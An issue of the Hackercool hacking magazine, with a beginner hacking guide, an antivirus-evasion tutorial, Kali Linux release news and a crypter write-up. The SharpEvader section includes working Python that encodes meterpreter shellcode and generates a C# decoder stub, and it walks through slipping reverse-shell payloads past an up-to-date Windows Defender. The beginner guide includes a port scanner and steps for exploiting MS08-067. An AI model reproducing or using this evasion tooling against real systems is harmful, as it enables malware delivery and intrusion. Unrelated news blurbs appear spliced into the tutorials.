Hackercool - Edition 5, Issue 8, August 2022



Copyright © 2016 Hackercool CyberSecurity (OPC) Pvt Ltd

All rights reserved. No part of this publication may be reproduced, distributed, or transmitted in any form or by any means, including photocopying, recording, or other electronic or mechanical methods, without the prior written permission of the publisher, except in the case of brief quotations embodied in critical reviews and certain other noncommercial uses permitted by copyright law. For permission requests, write to the publisher, addressed "Attention: Permissions Coordinator," at the address below.

Any references to historical events, real people, or real places are used fictitiously. Names, characters, and places are products of the author's imagination.

Hackercool Cybersecurity (OPC) Pvt Ltd.
Banjara Hills, Hyderabad 500034
Telangana, India.
Website: www.hackercoolmagazine.com
Email Address: [email protected]

Information provided in this Magazine is strictly for educational purposes only. Please don't misuse this knowledge to hack into devices or networks without taking permission. The Magazine will not take any responsibility for misuse of this information.

Then you will know the truth and the truth will set you free.

John 8:32

Editor's Note

Edition 5 Issue 8

Two of our Real World hacking tutorials did not work as expected. That is the reason for the delay this time. But since delay is delay, WE ARE SORRY.
"THE TECHNIQUE IS DESIGNED TO BE TRIGGERED WHEN THE USER STARTS THE
PRESENTATION MODE AND MOVES THE MOUSE, THE CODE EXECUTION RUNS A
POWERSHELL SCRIPT THAT DOWNLOADS AND EXECUTES A DROPPER FROM
ONEDRIVE."
- CYBERSECURITY FIRM CLUSTER25 ABOUT POWERPOINT MOUSEOVER ATTACK

INSIDE

See what our Hackercool Magazine August 2022 Issue has in store for you.

1. Real World Hacking: How To Become A Hacker By 2023?
2. Online Security: A New Data Privacy Bill Aims To Give You More Control Over Information Collected About You - and Make Businesses Change How They Handle Data.
3. Bypassing AntiVirus: SharpEvader.
4. What's New: Kali Linux 2022.3
5. Real World Hacking Scenario: What Is DarkTortilla And How It Evaded Detection since 2015?
6. Metasploit This Month: FreeSwitch Login, JBoss EAP / AS Remoting, Sourcegraph & Apache Spark
7. Email Security: Email Scams Are Getting More Personal - They Even Fool Cybersecurity Experts.
How To Become A Hacker by 2023?
REAL WORLD HACKING
People ask me so many questions about hacking. The questions are all about hacking, but they vary so much that I feel like they are trying to connect the Earth to various points in the Solar System, back and forth. Some of the questions include: how is Information Security the same as ethical hacking? What is the difference between Red Hat hacking and Black Hat hacking? Which programming language should I learn to become a hacker? What course should I take to become a hacker? And so on.
In this Issue, I decided to converge the various points these people are trying to connect and answer the question that appears at that convergence. That question is HOW TO BECOME A HACKER? Yes. How to become a hacker? This question is special to me for another reason too. The answer to the same question was the Feature Article of the first Issue of our Hackercool Magazine, six years back.
So, I feel like I am time travelling to the time of the birth of this Magazine. OK, enough science fiction or deja vu or whatever it is. Let's come to the point (or question). How to become a hacker?
To answer this question, I first need to define who a hacker is, or who is a hacker according to Hackercool Magazine. According to my definition, anybody who can hack is a hacker. That brings us to another question, just like clicking on an ISO file revealed a shortcut file in our previous Issue.
So, let's first answer that question. What is it to hack? This is one question I don't have words to answer. But I have one example, although I think it's a bit on the bad side. I don't remember if I used this example in my debut Issue.
A few years back, I read an article in a newspaper. The article was about mobile phones found in a prison. In prisons in India, prisoners are prohibited from using mobile phones (I assume it is the same all over the world). To make sure this rule is backed up by technology, a particular prison in India had jammers installed to prevent mobile communication.
However, some prisoners were somehow still able to communicate with the outside world using mobile phones. How did they do this while jammers were installed on the prison premises? A prisoner who happened to be an engineer suggested to his fellow prisoners that they place some salt on the jammer. Earlier, the prisoners had poured boiling water and even urinated on the jammer to disable it. On the engineer's suggestion, the prisoners formed a human pyramid with the engineer on top, and he placed the salt on the jammer. Within a few days the jammer became defunct.
How did they get salt? They used the salt provided in their daily meals. How did they get mobile phones? Smuggled in, or thrown by their relatives from outside into the prison compound. How did salt make the jammer defunct? This is one question I don't have an answer to. I have googled, but this trick is nowhere to be found and I don't want to go that deep into it. But it's still a cheap and awesome trick.
What I want my readers to notice is that the prisoners somehow made the jammer do something it was not intended to do. That's what hacking is, according to me. It's not about a device or a tool. It's about the creative thinking that makes the hack work for you.
Nowadays, since hacking is mostly about computers, laptops, firewalls, mobiles etc., I want to give you some baby steps, then small steps, followed by big steps to help you become a hacker. While giving you these steps, I am assuming you are a complete beginner. So first, let's start with the baby steps.
Baby Steps in Hacking
1. Get the basics of hacking right first. This is theoretical stuff. I want you to start with learning what a network is, how a network is formed, the various devices that form a network and the function of each device in a network, i.e. learn what a router is and what it does, what a switch is and what it does, what a desktop and a server are, etc.
2. While you are getting a grasp on the basics of a network, try to learn a bit of HTML and JavaScript (don't get into PHP yet. No, not yet). Why? HTML is the basic building block of websites all around the world. I think w3schools is the best place to start.
3. Once you have some knowledge about the devices that form a network, start learning about the protocols used for communication between the various devices in a network. Learn about the OSI model and the TCP/IP protocol suite. Learning about these may be a bit boring and sometimes complex (at least it seemed so to me), but they help you learn how exactly a network works. Well, you don't have to be so perfect that you could sit an exam in the topic the next day; just get a general idea of how a network works.
4. Also research other protocols like ARP, RARP, IP, SMB, FTP, SMTP, TCP, TELNET, POP, SFTP, NTP, PPP, IMAP and any other protocols that come up while you are learning about these.
Learn what ports are. Learn how many ports there are (port numbers run from 1 to 65535, separately for TCP and UDP), which protocols/services use which port, etc.
5. How is that HTML training going? By now, you should have a general idea of the structure of a website.
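As an added example (not from the magazine), here is a small TCP connect scanner with banner grabbing that puts the ports-and-services idea from step 4 into practice against your own lab target. It starts a throwaway listener on 127.0.0.1 so that it runs offline; the port-to-service table, the function names and the FTP-style greeting are constructed for this example. Point it only at machines you own or have permission to test.

```python
"""TCP connect scan with banner grabbing (added example, not from the magazine)."""
import socket
import socketserver
import threading
from typing import Dict, List, Optional, Tuple

# Constructed port/service table for labelling results; /etc/services on
# Linux and nmap's nmap-services file carry the full list.
COMMON_PORTS: Dict[int, str] = {
    21: "ftp", 22: "ssh", 23: "telnet", 25: "smtp", 80: "http", 110: "pop3",
    139: "netbios-ssn", 143: "imap", 443: "https", 445: "microsoft-ds",
    3306: "mysql",
}


def probe_port(host: str, port: int, timeout: float = 1.0) -> Optional[bytes]:
    """Complete a TCP handshake with host:port (a 'connect scan').

    Returns the banner bytes (possibly empty) when the port is open, or None
    when it is closed or filtered. Services like FTP, SSH and SMTP talk first,
    so we wait for a greeting; HTTP waits for the client, so if nothing
    arrives we send a harmless HEAD request and read the reply instead.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.settimeout(timeout)
            try:
                banner = sock.recv(256)
            except OSError:
                banner = b""
            if not banner:
                try:
                    sock.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
                    banner = sock.recv(256)
                except OSError:
                    banner = b""
            return banner
    except OSError:  # ConnectionRefusedError, timeout, unreachable host
        return None


def scan(host: str, ports: List[int], timeout: float = 1.0) -> Dict[int, str]:
    """Probe each port in turn; map open ports to their decoded banner."""
    results: Dict[int, str] = {}
    for port in ports:
        banner = probe_port(host, port, timeout)
        if banner is not None:
            results[port] = banner.decode("ascii", errors="replace").strip()
    return results


def describe(results: Dict[int, str]) -> List[str]:
    """Render scan results as 'port/tcp open service banner' lines."""
    return [
        f"{port}/tcp open {COMMON_PORTS.get(port, 'unknown'):<12} {results[port][:60]}"
        for port in sorted(results)
    ]


def start_fake_service(banner: bytes) -> Tuple[int, socketserver.TCPServer]:
    """Start a throwaway listener on 127.0.0.1 that greets every client with
    `banner`, so the example runs without a lab network. Returns (port, server)."""
    class Greeter(socketserver.BaseRequestHandler):
        def handle(self) -> None:
            self.request.sendall(banner)

    server = socketserver.TCPServer(("127.0.0.1", 0), Greeter)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server.server_address[1], server


def pick_closed_port() -> int:
    """Ask the OS for a free ephemeral port and release it, giving the scan a
    port that is (almost certainly) closed to contrast with the open one."""
    with socket.socket() as sock:
        sock.bind(("127.0.0.1", 0))
        return sock.getsockname()[1]


if __name__ == "__main__":
    # Constructed FTP-style greeting standing in for a real Metasploitable2 service.
    open_port, server = start_fake_service(b"220 lab-ftp FTP server ready\r\n")
    closed_port = pick_closed_port()
    for line in describe(scan("127.0.0.1", [open_port, closed_port])):
        print(line)
    server.shutdown()
    server.server_close()
```

A connect scan completes the full handshake, so it needs no privileges but leaves a connection log on the target; that is fine in your own lab and is also what you will see in the target's logs when you later look at the defender's side. Replace the fake service with the address of your Metasploitable2 VM and the port list with `range(1, 1025)` to see the same idea on a real target.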
Another question people often ask about hacking is how fast they can learn hacking, or how fast they can become perfect in hacking. Well, I don't want to get into all that stuff about how some people learn faster by reading and some by watching videos etc. What I want to tell you is this. No matter which method is your strongest way of learning things faster, your own research and practical training are the only things that can make you perfect in the art of hacking.
So, my advice to aspiring hackers is this. Take your own time. Don't be in a rush and don't try to cram everything at once. You know those crash courses that teach you hacking in 10/15/30 days? There's a reason why students who take those courses are still confused.
While I was a cyber security trainer in institutes that were teaching ethical hacking, the course time was around 30 days. After 30 days they could take their exam and get their certificate. Most of the students who took that course also wanted to become perfect in the art of hacking.
So they worked hard, which brought pressure, subsequently resulting in confusion and, in some extreme cases, losing interest totally. I am not against hard work at all, but there are some things which need to be achieved using SMART WORK. So, my advice to aspiring hackers is this: don't try to become perfect in a short time.
When people want to learn everything about hacking in a month, it reminds me of that woman Oxley (did I get the name right?) from the movie Indiana Jones: Kingdom of the Crystal Skull, who wanted to receive knowledge about everything from the crystal-skulled aliens. Well, though her wish was granted, we all know what happened to her.
I know what you want to ask me. You want to ask me why I titled my article "How to become a hacker by 2023?". That's because I assume that no matter which method you follow to learn hacking, you will at least be able to get a basic idea about the things I want you to learn. That timeframe can be 3 months on average.

Small Steps in Hacking

OK. In your own comfortable timeframe, you now know a bit about how networks work, the different devices in a network and their functions, how a website is designed, how and why JavaScript is used, what the OSI model is, what TCP/IP is, what ports are and the different services that use them, etc. As I already said, you don't have to be perfect in this. Now let's take some small steps.
1. Go through some basic hacking terminology: what is a threat, what is a vulnerability and what is an exploit. What is the CIA triad of cybersecurity (confidentiality, integrity, availability)? Don't get into the types-of-hacker stuff yet. I will explain them all to you by the end of this article.
2. Learn the difference between a server and a client. Learn about client-server networks and peer-to-peer networks. Learn about the different types of servers.
3. Now that you know what a server is and what a desktop is, it's time to install your first server. Why not start with a web server? Learn what the WAMP, XAMPP and LAMP stacks are and learn how to install them on your operating system. Google if you get any doubts while doing this.
4. If you want to learn hacking, you need hands-on experience with many operating systems. You can't get hands-on experience unless you install them on your host system. The best way to do this is by using virtualization software like Oracle VirtualBox and VMware. Oracle VirtualBox is free, whereas VMware Workstation is a commercial product. Get your favourite virtualization software and install it on your host system.
5. Since you have finished installing your favourite virtualization software, it's time to install operating systems on it. Start by installing Windows XP, Windows 7 and Windows Server 2003 to act as target operating systems. Why these? Because Microsoft has ended support for these versions, so their known vulnerabilities will never be patched and they are widely used as practice targets. Download Metasploitable2 and install it on the virtualization software too. Metasploitable2 is an intentionally vulnerable operating system designed for ethical hackers to practice hacking. You can install other operating systems too, based on your requirements. Remember that the only limitation here is the RAM available on your host operating system. Keep these target machines on a host-only or internal virtual network; never expose them to the internet, because they are exactly as vulnerable to everyone else as they are to you.
Coming to operating systems, we need an attacker system too. There are many distributions built precisely for penetration testing and hacking. The list includes Kali Linux, Parrot Security OS, Samurai WTF, Blackbuntu, etc. You need to install one (or more) of these to act as your attacker operating system.
Some aspiring hackers are confused as to which among the above is the best. Choose whichever one you like (don't have a never-ending debate within yourself like that Alien X on Ben 10). Don't look for the best one. If you can't decide, just do inky, pinky, ponky and select one.
While I was learning hacking, I was researching all the tools used in hacking, and I had a need
to download many tools and install them. It was becoming very troublesome this way. It was then that a thought flashed in my mind: "Is there any chance that someone has installed all the hacking tools in one place?" That's how I found my first attacker OS, Matriux Krypton. Then, on further research, I found there are a whole lot of other pen-testing distros. I tested them all and found BackTrack (the ancestor of Kali Linux) suitable for me. So, I shifted to it.
6. By now you have installed attacker and target systems on your favourite virtualization software. Play with both these systems and get used to them.
7. Read about various web vulnerabilities, starting with SQL Injection, LFI, RFI, CSRF, XSS etc. Try to understand these vulnerabilities. Let me tell you once again: take your own time. Grasp things slowly but steadily.
"To some people I'll always be the bad guy."
- Kevin Mitnick
Big Steps in Hacking

If you are here, let me tell you that by now you are a Green Hat Hacker. You may not feel like that, but you are one. Now, it's time to take some big steps.
1. Research what a Content Management System (CMS) is and what it does. Learn about the different CMSs and their share of usage on the internet. Once you have finished doing that (it shouldn't take you more than half an hour), download WordPress and Joomla and install them on the WAMP, XAMPP or LAMP server, whichever you installed. If you don't want to install Joomla, install WordPress. Why WordPress? Because WordPress is the most widely used CMS on the internet.
2. On the virtualization software you have installed, start your attacker system and Windows XP. Find out the IP addresses of both the attacker system and the target system (ip a, short for ip addr, in Linux and ipconfig in Windows). Check that the two can reach each other (ping from one to the other) before you go any further; most "the exploit doesn't work" problems at this stage are networking problems.
3. Almost all pen-testing distros are built on Linux. To make it dance to your tunes, you need to speak its language, or at least sing in its language. Enter Linux shell scripting. You can't even step into the world of hacking if you are not well versed in Linux shell scripting. It's like trying to learn swimming without getting into the water. The best way to start learning shell scripting is to start at linuxcommand.org.
4. While learning shell scripting, I advise you to also learn Batch programming (and its modern successor on Windows, PowerShell). Batch is to Windows what shell is to Linux, but remember that shell is more powerful. Learn both of these practically. These two are called scripting languages, and you will realise why they are so important later in your hacking journey. While hacking (I mean pen testing), you will most probably get a reverse shell. These two languages will help you play on the target system, whether it is Windows or Linux.
5. Google Metasploit. Learn how Metasploit works and research its usage. Our Magazine's previous Issues would be very helpful in this case.
6. Research the ms08_067 vulnerability (MS08-067, CVE-2008-4250, a remote code execution bug in the Windows Server service reachable over SMB without authentication). After thorough research, switch on your favourite attacker system, start Metasploit, search for the ms08_067 exploit and load the module (exploit/windows/smb/ms08_067_netapi). Also start the Windows XP you installed earlier and exploit the vulnerability with Metasploit. This is probably your first reverse shell.
7. By now, you have a fair idea about different web vulnerabilities. Research the different intentionally vulnerable web applications. These are web apps that are made intentionally vulnerable so that beginners in ethical hacking can practice website hacking. Install DVWA first in your WAMP/XAMPP/LAMP server and practice exploiting the different web vulnerabilities. See how they work and what you get when they work. Don't worry even if you don't get a perfect picture of these vulnerabilities.
8. Read about various famous (or infamous) vulnerabilities. See if anything comes up related to something you have learnt. Keep on researching, keep on reading articles about hacking and keep on practising hacking. Keep repeating all the baby, small and big steps again and again until you are confident about yourself.
OK. Now the final step. This is an answer to another question aspiring hackers often ask me. That question is: should we learn a programming language to learn hacking? If yes, which programming language is best for hackers?
Look. It's partly true that Elite Hackers write their own exploits for vulnerabilities because they know how to code. Yes, it is 118% true. But there's a catch here. Many of the APTs and criminal hacker groups are now buying exploits for zero-day vulnerabilities and even RaaS (Ransomware As A Service). This turns the whole concept of ELITE HACKER upside down.
Yes, if you are hacking using tools developed by others in the hacking field, you are a Script Kiddie.
Agreed. But if you are a beginner, it is definitely good to start as a Script Kiddie (but remember, you are a Green Hat Hacker). Try out everything. As you naturally progress in your hacking journey, you will feel a need to write your own exploits at some time. When you want to do that, you get to the second question. Which programming language to start with? I know everyone has his/her own favourite programming language among C, C++, Python, Ruby (the language Metasploit is written in), Perl etc. So which one to start with?
Start with the one you feel easy about or have a little bit of knowledge about. If you have no knowledge of any programming language, my personal suggestion is to start with Python. In my own experience, Python is a very simple language. When I code in Python, I feel like I am writing commands in simple English, like "Hey, you there, come here" etc. Of course, this is my personal opinion. But just because Python is easy doesn't mean it is powerless.
Python is one of the most powerful programming languages. The number of exploits for many vulnerabilities written in Python is proof of this. Once you are almost perfect in any one programming language, you can learn how to write exploit code for vulnerabilities on your own.
Welcome, ELITE HACKER.
OK. Now, you are a hacker (even though you are not yet an ELITE HACKER). It's time to decide what type of hacker you want to be. Let's start with the different types of hackers. There are various types of hackers, classified based on what they do and their level of skill.
Black Hat Hackers: Black Hat Hackers are also known as crackers or the bad hackers. They are the hackers with malicious intentions. If they find a zero-day vulnerability in a piece of software, they may sell it for profit or exploit it themselves for some profit. Malware writers, hackers for hire, ransomware groups and criminal hackers also come under this group.
White Hat Hackers: While Black Hat Hackers are the big bad of the hacker domain, White Hat Hackers are the good guys. They are also known as Ethical Hackers. They hack for only a single purpose, that is, to improve the security of a company's network. Pen testers, security researchers and other cybersecurity professionals can be termed White Hat Hackers.
Grey Hat Hackers: This type of hacker can be termed both bad and good. A Grey Hat Hacker can be a cyber security expert who finds a zero-day vulnerability in software but doesn't exploit it for malicious purposes like Black Hat Hackers do.
Green Hat Hackers: While giving our readers some steps to become a hacker above, I used the term Green Hat Hacker. Well, it's time to define it. A Green Hat Hacker is a person who is a beginner and still learning hacking skills. Although a beginner, he is determined to become an Elite Hacker at some point of time.
Bug Bounty Hackers: Companies nowadays pay hackers to hack their product or service and report any detected vulnerabilities to them. These vulnerabilities are known as bugs, and people who find these bugs and report them to the vendor get a cash reward or swag, depending on the company that is offering the bug bounty.
Blue Hat Hackers: Blue Hat Hackers are hackers who are hired by organizations to test for any vulnerabilities or bugs in a network or software. The only thing they do differently is that they do this testing before the product is launched or the network has gone LIVE.
Red Hat Hackers: Red Hat Hackers are the radical and extreme version of White Hat Hackers. They also try to find vulnerabilities in systems and networks, but they do this with the specific purpose of hunting for Black Hat Hackers. They are hired by Governments and hence they are ruthless in their hunt for Black Hat Hackers. In one sentence, their end justifies their means.
Script Kiddie: The beginner stage of almost every hacker. Script Kiddies lack skills like writing exploits etc. The only thing they are good at is using tools made by other hackers. So, if you are downloading that Facebook hacking software to hack Facebook, you know what you are?
Elite Hacker: The Elite Hacker is the complete opposite of the Script Kiddie. He is an expert in cyber security who not only writes his own exploits for vulnerabilities but also finds those vulnerabilities himself/herself. Everyone in the hacking world aspires to become an Elite Hacker one day or the other. Ex: Phineas Fisher.
Hacktivist: A hacker who doesn't have any personal profit in hacking. He hacks for non-profit causes or public causes. These can be environmental, public interest or human rights causes etc. The likes of Edward Snowden and Julian Assange.
Suicide Hacker: A hacker who is so interested in hacking that he doesn't really care about the consequences.
Spy Hacker: A hacker who spies on targets. These are normally used in corporate espionage or maybe even by nations.
State Sponsored Hackers/Nation Sponsored Hackers: These hackers are appointed by the Governments of nations to hack into another nation's computer systems or networks. They are more popularly known as Advanced Persistent Threats (APTs).
Now, you know how to become a hacker and also what type of hacker you want to be. So what are you waiting for? Start taking those baby, small and big steps and then choose your own hat.
A new US data privacy bill aims to give you more control over information collected about you – and make businesses change how they handle data.

ONLINE SECURITY

Anne Toomey McKenna, Visiting Professor of Law, University of Richmond.

Data privacy in the U.S. is, in many ways, a legal void. While there are limited protections for health and financial data, the cradle of the world's largest tech companies, like Apple, Amazon, Google, and Meta (Facebook), lacks any comprehensive federal data privacy law. This leaves U.S. citizens with minimal data privacy protections compared with citizens of other nations. But that may be about to change.

With rare bipartisan support, the American Data and Privacy Protection Act moved out of the U.S. House of Representatives Committee on Energy and Commerce by a vote of 53-2 on July 20, 2022. The bill still needs to pass the full House and the Senate, and negotiations are ongoing. Given the Biden administration's responsible data practices strategy, White House support is likely if a version of the bill passes.

As a legal scholar and attorney who studies and practices technology and data privacy law, I've been closely following the act, known as ADPPA. If passed, it will fundamentally alter U.S. data privacy law.

ADPPA fills the data privacy void, builds in federal preemption over some state data privacy laws, allows individuals to file suit over violations and substantially changes data privacy law enforcement. Like all big changes, ADPPA is getting mixed reviews from media, scholars and businesses. But many see the bill as a triumph for U.S. data privacy that provides a needed national standard for data practices.

ADPPA would apply to "covered" entities, meaning any entity collecting, processing or transferring covered data, including nonprofits and sole proprietors. It also regulates cellphone and internet providers and other common carriers, with potentially concerning changes to federal communications regulation. It does not apply to government entities.

ADPPA defines "covered" data as any information or device that identifies or can be reasonably linked to a person. It also protects biometric data, genetic data and geolocation information.

The bill excludes three big data categories: deidentified data, employee data and publicly available information. That last category includes social media accounts with privacy settings open to public viewing. While research has repeatedly shown deidentified data can be easily reidentified, the ADPPA attempts to address that by requiring covered entities to take "reasonable technical, administrative, and physical measures to ensure that the information cannot, at any point, be used to re-identify any individual or device."

"ECPA, for comparison, has a private right of action. It has not overwhelmed courts or businesses, and entities likely comply with ECPA to avoid civil litigation."

The act would require data collection to be as minimal as possible. The bill allows covered entities to collect, use or share an individual's data only when reasonably necessary and proportionate to a product or service the person requests or to respond to a communication the person initiates. It allows collection for authentication, security incidents, prevention of illegal activities or serious harm to persons, and compliance with legal obligations.

People would gain rights to access and have some control over their data. ADPPA gives users the right to correct inaccuracies and potentially delete their data held by covered entities.

The bill permits data collection as part of research for public good. It allows data collection for peer-reviewed research or research done in the public interest – for example, testing whether a website is unlawfully discriminating. This is important for researchers who might otherwise run afoul of site terms or hacking laws.

The ADPPA also has a provision that tackles the service-conditioned-on-consent problem – those annoying "I Agree" boxes that force people to accept a jumble of legal terms. When you click one of those boxes, you contractually waive your privacy rights as a condition to simply use a service, visit a website or buy a product. The bill will prevent covered entities from using contract law to get around the bill's protections.

The U.S.'s Electronic Communications Privacy Act can provide federal lawmakers guidance in finalizing ADPPA. Like the ADPPA, the 1986 ECPA legislation involved a massive overhaul of U.S. electronic privacy law to address adverse effects to individual privacy and civil liberties posed by advancing surveillance and communication technologies. Once again, advances in surveillance and data technologies, such as artificial intelligence, are significantly affecting citizens' rights.

ECPA, still in effect today, provides a baseline national standard for electronic surveillance protections. ECPA protects communications from interception unless one party to the communication consents. But ECPA does not preempt states from passing more protective laws, so states can choose to provide greater privacy rights. The end result: roughly a quarter of U.S. states require consent of all parties to intercept a communication, thus providing their citizens increased privacy rights.

ECPA's federal/state balance has worked for decades now, and ECPA has not overwhelmed the courts or destroyed commerce.

As drafted, ADPPA preempts some state data privacy legislation. This affects California's Consumer Privacy Act, although it does not preempt the Illinois Biometric Information Privacy Act or
(Cont'd On Page 33)

Sharp Evader

BYPASSING ANTIVIRUS

In this month's AV Evasion, readers will learn about a Python script called Sharp Evader. Sharp Evader automatically generates meterpreter reverse_tcp or reverse_https shellcode with msfvenom, Caesar-encodes it, and drops the encoded bytes into a generated C# project. Some more measures are then applied to bypass behavioural detection. The features of this Python script, as its author lists them, are:

1. Automatic generation of windows/x64/meterpreter/reverse_https or windows/x64/meterpreter/reverse_tcp shellcode by borrowing msfvenom.
2. Applying magic sauce that helps in bypassing signature-based detection. (The magic sauce is absolutely not Caesar Cipher.)
3. Generating a C# project with the encoded shellcode and some more spells to bypass behaviour-based detection.
4. A PowerShell script to generate a reflection ps1 script with the C# executable embedded inside it.
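The first two features are the part readers can reason about without the tool: the raw stager bytes are shifted so that the file on disk no longer contains the pattern a static signature looks for, and a decoder loop inside the C# project rebuilds them in memory. The script below is an added example written for this article; it is not SharpEvader's code, and the sample bytes, the key of 7 and the C# stub layout are assumptions made for illustration.

```python
"""Added example (not SharpEvader's own code): a byte-shift encoder for a
shellcode blob and a generator for the C# fragment that decodes it at run
time.  SAMPLE_SHELLCODE is a constructed placeholder, not msfvenom output."""

# Constructed stand-in; in practice this is the raw output of
# msfvenom -p windows/x64/meterpreter/reverse_https LHOST=... LPORT=... -f raw
SAMPLE_SHELLCODE = bytes([0xFC, 0x48, 0x83, 0xE4, 0xF0, 0xE8, 0xC0, 0x00, 0x00, 0x00])


def shift_encode(data: bytes, key: int) -> bytes:
    """Caesar-style shift over the byte alphabet: (b + key) mod 256 for every byte."""
    if not 1 <= key <= 255:
        raise ValueError("key must be 1..255; 0 would leave the bytes unchanged")
    return bytes((b + key) & 0xFF for b in data)


def shift_decode(data: bytes, key: int) -> bytes:
    """Inverse of shift_encode."""
    return bytes((b - key) & 0xFF for b in data)


def unchanged_positions(original: bytes, encoded: bytes) -> int:
    """How many bytes survive encoding unchanged (a byte-pattern signature needs them)."""
    return sum(1 for a, b in zip(original, encoded) if a == b)


def to_csharp_array(data: bytes, per_line: int = 12) -> str:
    """Render bytes as a C# byte[] initialiser."""
    items = [f"0x{b:02x}" for b in data]
    rows = [", ".join(items[i:i + per_line]) for i in range(0, len(items), per_line)]
    return "new byte[] {\n    " + ",\n    ".join(rows) + "\n}"


def generate_csharp(shellcode: bytes, key: int) -> str:
    """Emit the encoded buffer plus a decoder loop (hypothetical stub, not SharpEvader's template)."""
    encoded = shift_encode(shellcode, key)
    lines = [
        "// Generated stub: the file on disk carries only the shifted bytes;",
        "// Decode() rebuilds the original buffer in memory just before use.",
        f"static readonly byte[] Encoded = {to_csharp_array(encoded)};",
        f"const int Key = {key};",
        "static byte[] Decode()",
        "{",
        "    var buf = new byte[Encoded.Length];",
        "    for (int i = 0; i < Encoded.Length; i++)",
        "        buf[i] = (byte)((Encoded[i] - Key) & 0xFF);",
        "    return buf;",
        "}",
    ]
    return "\n".join(lines) + "\n"


if __name__ == "__main__":
    print(generate_csharp(SAMPLE_SHELLCODE, key=7))
```

Two things worth noticing. With any non-zero key, not a single byte of the stager survives in the encoded array, which is exactly why a byte-pattern signature for the raw stager does not fire on the executable. The shift is not secrecy, though: anyone with the file can recover the key by trying 255 values, and an engine that emulates the decoder loop, or scans the process after Decode() runs, sees the original bytes. That is the gap the tool's "behavioural" measures are meant to cover, and it is why the success shown later in this article should be re-tested after every Defender definition update.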
To use this tool, clone it from GitHub as shown below.

This creates a directory named sharpEvader. Inside this directory there is a Python script named sharpevader.py. This is our script.
Before running the Python script, let's install PowerShell and mono on Kali Linux. Why do we need PowerShell? It is used to generate the PowerShell reverse shell script rev.ps1. This script carries the C# executable embedded inside the PS1, which is then loaded reflectively into memory. mono-mcs is the C# compiler package.

Once mono-mcs and PowerShell are installed successfully on Kali, run the Sharp Evader Python script as shown below.

Specify the LHOST and LPORT options and the type of payload you want, as shown below.
This will now generate our meterpreter payload.

The generated payload is in the "output" directory, in a subdirectory named after the LHOST IP and LPORT we set.

As readers can see, both the executable and the PowerShell payloads are present.
Good, now let's test it on the target system. Before moving the payload to the target system, start a Metasploit listener on the attacker system.

The listener's ready. Now let's move the payload to the target system.

Let's make sure Windows Defender is up to date.

Let's download the payload to the target system and execute it.
London Police have arrested a 17-year-old teenager from Oxfordshire on suspicion of some high-profile hacks.
As readers can see, we successfully have a meterpreter session.

Now, let's try the same with the PowerShell payload.
Sophos released a patch for a new zero-day vulnerability in its firewall product. This zero-day vulnerability was being actively exploited by attackers in the wild.
We once again have a meterpreter session.

In both cases, Windows Defender failed to detect the malicious payload. Keep in mind that Defender's definitions change daily: a build that slips past today may be flagged after the next update, so re-test a generated payload before relying on it. In the output directory of SharpEvader, readers can see a directory named csharp. Inside this csharp directory, you will see the C# project of the reverse shell payload we just generated.

In case you don't have PowerShell and mono installed on the attacker system, you can simply move this C# project to a Windows system with Visual Studio installed and build it there. This procedure has been shown multiple times in previous Issues of our Magazine.
Kali Linux 2022.3

WHAT'S NEW

It's a bit odd. While we were writing "What's New" for our previous Issue, the makers of Kali released the latest version of the operating system, Kali Linux 2022.3. In this Issue, let's see what's new in Kali Linux 2022.3.

TEST LAB ENVIRONMENT

In the feature article of this Issue, "How to become a hacker", I told you about the importance of practice to become a hacker and also gave you a few resources for practising hacking. It's just a coincidence that the makers of Kali Linux have decided to make it easier for aspiring hackers to practise. They did this by packaging some intentionally vulnerable apps as Kali packages that can be installed like any other package. To begin with, they are bringing DVWA and OWASP Juice Shop; I am sure more apps will follow in future releases. Let us see how to install DVWA in this Issue. After booting the latest release of Kali, open a terminal and enter the command sudo apt update.

Next, install DVWA as shown below.
CISA has warned that hackers are actively exploiting the recently disclosed vulnerability in Zoho ManageEngine.
The installation should finish as shown below.

Start the dvwa service as shown below.

The dvwa service is successfully started.
The DVWA package comes with its own Nginx server and does not touch the Apache server that ships with Kali Linux. The configuration files of DVWA are in the /etc folder. For example, if you want to change the port on which DVWA is running, edit the dvwa-nginx.conf file. Remember that DVWA is deliberately vulnerable: keep it bound to localhost or an isolated lab network, and never leave it listening on an interface reachable from the internet.
VIRTUAL MACHINE UPDATES

With this release, the VirtualBox image of Kali is shipped as a VDI disk plus a .vbox metadata file instead of an OVA file. VDI is VirtualBox's native disk format and compresses better than an OVA.
NEW TOOLS

Just like any other release of Kali, new tools have been added this time too. The tools new to this release are BruteShark, DefectDojo, phpsploit, shellfire and SprayingToolkit.
KALI NETHUNTER UPDATES

Many apps in the NetHunter store have been updated to their latest release. With updates to the NetHunter app and the addition of 6 new kernels to the NetHunter repository, support for Android 12 is getting closer.
KALI ARM UPDATES

With this release, the default size of the boot partition has been set to 256MB for every Kali ARM device. The kernel of all Raspberry Pi devices has been upgraded to 5.15. The broken sleep modes problem of the Pinebook has been fixed too.
KALI TOOLS REPO

The Kali Tools repository has been opened up to accept community contributions. So, if you have a tool (your own tool) that you want to see in Kali Linux, this is the chance. Make sure you supply general information about the tool, examples of its usage and instructions on how to use it when you submit it.
DISCORD SERVER

A new Discord server has been opened, named "Kali Linux & Friends". This is for the Kali community to get together and chat in real time. So, if you are facing any problem or have a question, search for your topic there and ask.
ARE YOU THE GUY/GIRL?

If you know Go (the Golang programming language), then you could be the person the Kali Linux makers are looking for. They need some help with an existing project. If you think you fit this description, you should tweet at them directly or email them at i can help at kali dot org. Other than all these, the latest version of Kali received many minor updates too.
MooBot, a variant of the Mirai botnet, is now co-opting vulnerable D-Link devices into an army of DDoS bots by taking advantage of multiple exploits.
What Is DarkTortilla And How Has It Evaded Detection Since 2015?

REAL WORLD HACKING SCENARIO

Our readers have learnt about some crypters in our Magazine. A crypter is software used to make malware undetectable by anti-malware. DarkTortilla is one such crypter. What is special about DarkTortilla is not just that it has been around since 2015 but that it has been successful in evading detection since then.

In this article, readers will learn how DarkTortilla has been evading detection. DarkTortilla is a .NET-based crypter that has been used to deliver many popular information stealers and RATs such as Agent Tesla, RedLine, NanoCore, AsyncRAT, Cobalt Strike and even Metasploit payloads.

Researchers at the Counter Threat Unit (CTU) of Secureworks observed that, on average, 93 samples of DarkTortilla were uploaded to VirusTotal every week between January 2021 and May 2022. They began analysing those samples, and this article is a result of their analysis.
Mode Of Delivery

